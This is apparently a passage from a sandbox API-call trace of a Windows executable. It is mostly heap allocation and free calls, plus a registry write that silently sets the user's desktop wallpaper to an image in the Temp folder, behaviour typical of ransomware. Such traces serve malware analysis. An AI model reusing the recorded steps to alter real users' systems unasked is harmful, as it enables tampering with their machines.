(HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0235.802] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0235.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4e8 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0235.802] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29ead40 [0235.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ead40 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0235.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0235.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0235.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0235.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0235.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73840 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0235.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0235.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0235.804] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0235.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0235.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0235.804] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0235.804] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0235.804] RegCloseKey (hKey=0x4e0) returned 0x0 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73840 | out: hHeap=0x2af0000) returned 1 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0235.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0235.805] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0235.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0235.805] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0235.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0235.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0235.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0235.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0235.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0235.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0235.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0235.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0235.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0235.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0235.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0235.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0235.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0235.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0235.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0235.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0235.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0235.808] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0235.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0235.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0235.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0235.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0235.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0235.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0235.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0235.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0235.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0235.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0235.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0235.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0235.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0235.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0235.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0235.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0235.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0235.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0235.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0235.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0235.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0235.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0235.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0235.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0235.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0235.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0235.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0235.811] 